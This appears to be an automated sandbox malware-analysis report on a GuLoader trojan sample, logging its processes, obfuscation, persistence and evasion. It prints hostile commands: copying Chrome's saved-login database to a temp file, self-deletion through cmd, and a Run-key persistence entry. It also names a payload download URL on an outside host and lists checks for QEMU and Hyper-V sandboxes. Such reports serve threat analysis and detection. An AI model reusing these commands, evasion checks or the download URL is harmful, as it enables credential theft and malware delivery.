Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Section loaded: edgegdi.dll
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Section loaded: edgegdi.dll
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Section loaded: edgegdi.dll
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Section loaded: edgegdi.dll
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Section loaded: edgegdi.dll
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Section loaded: edgegdi.dll
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Section loaded: edgegdi.dll
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Section loaded: edgegdi.dll
PE / OLE file has an invalid certificate
Source: Zr26f1rL6r.exe Static PE information: invalid certificate
Source: Zr26f1rL6r.exe Virustotal: Detection: 40%
Source: Zr26f1rL6r.exe ReversingLabs: Detection: 20%
Source: Zr26f1rL6r.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: unknown Process created: C:\Users\user\Desktop\Zr26f1rL6r.exe "C:\Users\user\Desktop\Zr26f1rL6r.exe"
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Process created: C:\Users\user\Desktop\Zr26f1rL6r.exe "C:\Users\user\Desktop\Zr26f1rL6r.exe"
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Zr26f1rL6r.exe"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
Source: C:\Windows\explorer.exe Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Process created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe File created: C:\Users\user\AppData\Local\Temp\~DFBF74AAE9E8A330D2.TMP
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@24/6@68/14
Source: C:\Windows\explorer.exe File read: C:\Users\desktop.ini
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:424:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:424:304:WilStaging_02
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\rundll32.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\
Source: Binary string: wntdll.pdbUGP source: Zr26f1rL6r.exe, 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51750821024.000000001E890000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51752294745.000000001E9BD000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: c8ahotgz8h.exe, c8ahotgz8h.exe, 0000001E.00000002.51750821024.000000001E890000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51752294745.000000001E9BD000.00000040.00000001.sdmp
Source: Binary string: rundll32.pdb source: Zr26f1rL6r.exe, 0000000A.00000002.47938438528.00000000000D0000.00000040.00020000.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47933760701.00000000008E5000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdbGCTL source: Zr26f1rL6r.exe, 0000000A.00000002.47938438528.00000000000D0000.00000040.00020000.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47933760701.00000000008E5000.00000004.00000001.sdmp

Data Obfuscation:

Yara detected GuLoader
Source: Yara match File source: 0000001E.00000000.51287210518.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.47309959760.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000000.51076893477.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000000.51204349057.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.51740663183.0000000000560000.00000040.00000001.sdmp, type: MEMORY
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_004093B3 push ebx; ret 2_2_004093B4
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02313800 push 4674B5B4h; retf 2_2_02313876
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02312286 push esi; retf 2_2_02312228
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02315814 pushfd ; retf 2_2_023158DE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02315814 push ebx; retf 2_2_02315A54
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02313841 push 4674B5B4h; retf 2_2_02313876
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02310047 push ds; ret 2_2_02310051
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02310047 push ds; ret 2_2_023100B3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_023138B3 push 4674B5B4h; retf 2_2_02313876
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_0231388E push 4674B5B4h; retf 2_2_02313876
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_023158DF pushfd ; retf 2_2_023158DE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_023160C4 pushfd ; iretd 2_2_023160C7
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_023138CA push 4674B5B4h; retf 2_2_02313876
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02315919 push ebx; retf 2_2_02315A54
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02311918 push esi; ret 2_2_0231192F
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_0231010F push ds; ret 2_2_023100B3
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_0231590E pushfd ; retf 2_2_023158DE
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_0231597F push ebx; retf 2_2_02315A54
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02312954 pushad ; ret 2_2_02312955
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_023159A2 push ebx; retf 2_2_02315A54
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_023159AE push ebx; retf 2_2_02315A54
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02315996 push ebx; retf 2_2_02315A54
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_0231598A push ebx; retf 2_2_02315A54
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_02314DAC push ecx; ret 2_2_02314DAD
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_1E8C08CD push ecx; mov dword ptr [esp], ecx 10_2_1E8C08D6
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_00573F15 push edi; ret 10_2_00573F18
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_00573F11 push edi; ret 10_2_00573F14
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_00573F1D push edi; ret 10_2_00573F20
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_00573F19 push edi; ret 10_2_00573F1C
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_00573F0D push edi; ret 10_2_00573F10
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 10_2_00573F21 push edi; ret 10_2_00573F24

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\Grt4lhl\c8ahotgz8h.exe
Source: C:\Program Files\Mozilla Firefox\firefox.exe Code function: 25_2_000001BF400004B2 GetPrivateProfileSectionNamesW,GetPrivateProfileStringW, 25_2_000001BF400004B2
Source: C:\Windows\SysWOW64\rundll32.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run YNULIT20

Hooking and other Techniques for Hiding and Protection:

Self deletion via cmd delete
Source: C:\Windows\SysWOW64\rundll32.exe Process created: /c del "C:\Users\user\Desktop\Zr26f1rL6r.exe"
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Tries to detect Any.run
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe File opened: C:\Program Files\qga\qga.exe
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe File opened: C:\Program Files\qga\qga.exe
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: Zr26f1rL6r.exe, 00000002.00000002.47313581673.00000000031C0000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941334690.0000000002440000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51079209491.0000000000714000.00000004.00000020.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082351665.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210744742.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292766940.00000000031A0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537329411.0000000002430000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51661997405.0000000000820000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743297176.0000000002490000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Zr26f1rL6r.exe, 0000000A.00000002.47941334690.0000000002440000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537329411.0000000002430000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51661997405.0000000000820000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743297176.0000000002490000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=HTTPS://ATSEASONALS.COM/GHRTT/BIN_KBJOEPXZ175.BIN
Source: c8ahotgz8h.exe, 00000016.00000002.51079209491.0000000000714000.00000004.00000020.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXET
Source: Zr26f1rL6r.exe, 00000002.00000002.47311303704.000000000060D000.00000004.00000020.sdmp Binary or memory string: \??\C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
Source: Zr26f1rL6r.exe, 00000002.00000002.47313581673.00000000031C0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082351665.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210744742.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292766940.00000000031A0000.00000004.00000001.sdmp Binary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKOSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\explorer.exe TID: 7852 Thread sleep time: -165000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Code function: 2_2_0232045A rdtsc 2_2_0232045A
Found large amount of non-executed APIs
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe API coverage: 1.1 %
Source: C:\Windows\SysWOW64\rundll32.exe API coverage: 2.8 %
Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe API coverage: 1.0 %
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0040FA90 FindFirstFileW,FindNextFileW,FindClose, 15_2_0040FA90
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 15_2_0040FA89 FindFirstFileW,FindNextFileW,FindClose, 15_2_0040FA89
Source: C:\Users\user\Desktop\Zr26f1rL6r.exe System information queried: ModuleInformation
Source: Zr26f1rL6r.exe, 0000000A.00000002.47939178909.0000000000828000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW8
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp Binary or memory string: Hyper-V Remote Desktop Virtualization Service
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp Binary or memory string: Hyper-V Volume Shadow Copy Requestor
Source: rundll32.exe, 0000000F.00000002.51919706063.00000000005EB000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW[0
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp Binary or memory string: Hyper-V Time Synchronization Service
Source: c8ahotgz8h.exe, 0000001C.00000003.51529209702.0000000000905000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51527691792.0000000000905000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51536267379.0000000000905000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAWDmB
Source: Zr26f1rL6r.exe, 0000000A.00000003.47934144925.0000000000888000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47749514601.0000000000888000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47939814865.0000000000888000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47750467223.0000000000888000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47778020706.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.48060566667.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47823943655.000000000D046000.00000004.00000001.sdmp, explorer.exe, 0000000E.00000000.47876026122.000000000D046000.00000004.00000001.sdmp, rundll32.exe, 0000000F.00000002.51919706063.00000000005EB000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51529209702.0000000000905000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000003.51527691792.0000000000905000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51536267379.0000000000905000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51662983793.000000000097E000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001D.00000003.51655599394.000000000097E000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000003.51735327927.0000000000853000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51741391174.00000000007E5000.00000004.00000020.sdmp, c8ahotgz8h.exe, 0000001E.00000003.51734441811.0000000000853000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51742109864.0000000000853000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW
Source: c8ahotgz8h.exe, 0000001D.00000002.51662442297.0000000000914000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW(
Source: Zr26f1rL6r.exe, 00000002.00000002.47313581673.00000000031C0000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941334690.0000000002440000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51079209491.0000000000714000.00000004.00000020.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082351665.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210744742.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292766940.00000000031A0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537329411.0000000002430000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51661997405.0000000000820000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743297176.0000000002490000.00000004.00000001.sdmp Binary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
Source: Zr26f1rL6r.exe, 0000000A.00000002.47941334690.0000000002440000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537329411.0000000002430000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51661997405.0000000000820000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743297176.0000000002490000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=https://atseasonals.com/GHrtt/bin_kbJoepxz175.bin
Source: c8ahotgz8h.exe, 0000001C.00000002.51535505064.0000000000884000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp Binary or memory string: Hyper-V Heartbeat Service
Source: Zr26f1rL6r.exe, 00000002.00000002.47311303704.000000000060D000.00000004.00000020.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exe
Source: firefox.exe, 00000019.00000002.50723124652.000001BF40270000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp Binary or memory string: Hyper-V Guest Shutdown Service
Source: Zr26f1rL6r.exe, 00000002.00000002.47313581673.00000000031C0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082351665.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210744742.00000000031B0000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292766940.00000000031A0000.00000004.00000001.sdmp Binary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublisherwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Geckoshell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
Source: c8ahotgz8h.exe, 00000016.00000002.51079209491.0000000000714000.00000004.00000020.sdmp Binary or memory string: \??\C:\Program Files\Qemu-ga\qemu-ga.exet
Source: c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp Binary or memory string: vmicshutdown
Source: c8ahotgz8h.exe, 0000001E.00000003.51735327927.0000000000853000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000003.51734441811.0000000000853000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51742109864.0000000000853000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW\
Source: rundll32.exe, 0000000F.00000002.51918468762.000000000056D000.00000004.00000020.sdmp Binary or memory string: Hyper-V RAW(9_%SystemRoot%\system32\mswsock.dll
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp Binary or memory string: Hyper-V PowerShell Direct Service
Source: c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp Binary or memory string: vmicvss
Source: Zr26f1rL6r.exe, 00000002.00000002.47313677308.0000000003289000.00000004.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47941584384.00000000025B9000.00000004.00000001.sdmp, c8ahotgz8h.exe, 00000016.00000002.51082515564.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001A.00000002.51210974523.0000000003279000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001B.00000002.51292888312.0000000003269000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51537553719.0000000002629000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51664137281.0000000002499000.00000004.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51743441994.0000000002559000.00000004.00000001.sdmp Binary or memory string: Hyper-V Data Exchange Service
